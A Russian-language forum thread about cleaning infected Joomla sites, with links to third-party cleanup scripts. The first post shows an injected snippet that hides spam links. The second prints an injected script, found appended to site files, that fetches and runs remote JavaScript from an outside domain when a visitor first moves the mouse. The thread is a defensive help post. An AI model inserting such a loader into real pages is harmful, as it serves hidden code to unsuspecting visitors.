×
Ruby on Rails: постинг твитов через Twitter API (04 нояб 2017)

Практикуемся в Ruby on Rails.

Важно Лечебный скрипт для сайта

Больше
6 года 4 мес. назад - 6 года 4 мес. назад #1 от Aleksej
Aleksej создал эту тему: Лечебный скрипт для сайта
Весной-летом этого года (2011) по форумам рунета прокатилась волна сообщений, авторы которых душераздирающе рассказывали о заражении их сайта на J!1.5 неизвестным природе вирусом... откуда он берется, что тому виной - неумение и дырявые руки web-мастера, ворованные скрипты для сайта или некриптостойкий пароль - так и осталось "за кадром".

Известно только, на сайте (где-нить в футере) появляется куча невидимых ссылок, спрятанных в
<p style="display:none">
, а в шаблоне - вот такой код:
<!--cacheb--><?php if (defined('JOOMLA_CACHE')) { echo JOOMLA_CACHE; } ?><!--cachee-->
Ситуация не так безобидна, как может показаться; Яндекс неуклонно банит за такое, так как линки ведут всяко не на ya.ru. Поэтому - будьте осторожны! Ночью, когда силы зла властвуют безраздельно - не выходите на болото... не качайте варез - дороже станет, не присвайвайте каталогам вашего сайта три семерки напропалую... и т.д. и т.п.

А если все же не повезло и вы нашли на своем драгоценном web-ресурсе данный код и данную напасть - попробуйте воспользоваться скриптом Сергея Болотова, написанным специально для этой цели... Если помогло - можете перевести автору любую сумму на эти кошельки - ЯД 41001251003183 или R545653827015 или Z267652009871.

Инструкция по применению. Скрипт не чистит шаблон, но удаляет заразу и код в шаблоне становится пассивным. Распаковать, залить в корень av.php и запустить в браузере -

http://vash_site/av.php

Скачать скрипт
Последнее редактирование: 6 года 4 мес. назад от Aleksej.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.

Больше
6 года 4 мес. назад - 6 года 4 мес. назад #2 от Aleksej
Aleksej ответил в теме Re: Лечебный скрипт для сайта
Продолжаем тему удаления вирусов с сайта.
Бывает так - открываем сайт, и вдруг видим сообщение, что в той или иной строчке index.php - ошибка. Открываем злополучный файл, и где-то в конце его видим следующее:
<script type=»text/javascript» src=»https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js»></script><script type=»text/javascript»>var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1; x.getScript(‘http://firefoxstabs.com/’ + Math.random().toString().substring(3) + ‘.js’, function() {flag = 2;});}});});</script>

Таким образом могут быть заражены все файлы menu, index, default (php, js, html). В joomla тысячи таких файлов, так что ситуация невеселая.

Если, не дай бог, у вас приключилась подобная напасть - попробуйте воспользоваться вот этим скриптом. Распакуйте архив и поместите antivirus.php в корень сайта, а затем откройте; получите страничку с перечнем всех зараженных файлов и кнопками "лечить". После лечения - идете в этот файлик, меняете index - на menu, проделываете ту же процедуру, затем - на default.

И - скорейшего вам выздоровления!
Последнее редактирование: 6 года 4 мес. назад от p.rishard.

Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.